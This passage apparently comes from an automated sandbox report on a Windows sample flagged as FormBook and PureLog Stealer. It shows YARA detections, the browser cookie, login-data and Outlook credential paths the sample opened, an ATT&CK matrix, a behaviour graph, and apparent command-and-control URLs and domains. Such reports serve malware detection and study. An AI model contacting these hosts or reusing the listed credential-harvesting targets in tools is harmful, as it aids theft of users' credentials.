                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.41d24c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.7c40000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.7c40000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.41d24c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.322dd8c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1701516930.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1697576288.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.41d24c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.7c40000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.7c40000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.41d24c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QsBdpe1gK5.exe.322dd8c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1701516930.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1697576288.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589101 Sample: QsBdpe1gK5.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 31 www.ssps.shop 2->31 33 www.regislemberthe.online 2->33 35 17 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected PureLog Stealer 2->49 51 4 other signatures 2->51 10 QsBdpe1gK5.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\QsBdpe1gK5.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 QsBdpe1gK5.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 oPkpFmCiYVL.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 find.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 oPkpFmCiYVL.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 dojodigitize.shop 15.197.142.173, 49741, 50061, 80 TANDEMUS United States 23->37 39 0be.info 173.0.157.187, 49886, 49903, 49923 SERVERS-COMUS United States 23->39 41 9 other IPs or domains 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      QsBdpe1gK5.exe80%VirustotalBrowse
                      QsBdpe1gK5.exe88%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      QsBdpe1gK5.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd0%Avira URL Cloudsafe
                      http://www.ssps.shop/r99d/?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.incgruporxat.click/rm8a/0%Avira URL Cloudsafe
                      http://www.hasan.cloud/ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8=0%Avira URL Cloudsafe
                      http://www.incgruporxat.click/rm8a/?sTS=D6HNS+3OA9WxuB6ixfDf8ScOMqf60XWg1eRGn1U3pQm4dbrOXbziEv17YWBDjG9YL3PgZ6NF0eFX/SB1L/rjn2byVNbXQbqI29dbukDAFIdClQ55cQRWn7Y=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.regislemberthe.online/1y0g/?sTS=IEuRIrUs/61ernzXW8DdDQ7UXMybyf23DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNeeBm+a+pfpebFy1eZZqf08c6FVwESRpxQuE=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://digi-searches.com/px.js?ch=10%Avira URL Cloudsafe
                      http://www.goldbracelet.top/eln6/?sTS=dR5Y3aKNW3l55kUMNVrLYxm/K9ThMGgB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd/kFlGTTehU6/lxZCa6BP/PSovIsDoNSFVQ=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://digi-searches.com/px.js?ch=20%Avira URL Cloudsafe
                      http://www.regislemberthe.online/1y0g/0%Avira URL Cloudsafe
                      http://www.incgruporxat.click0%Avira URL Cloudsafe
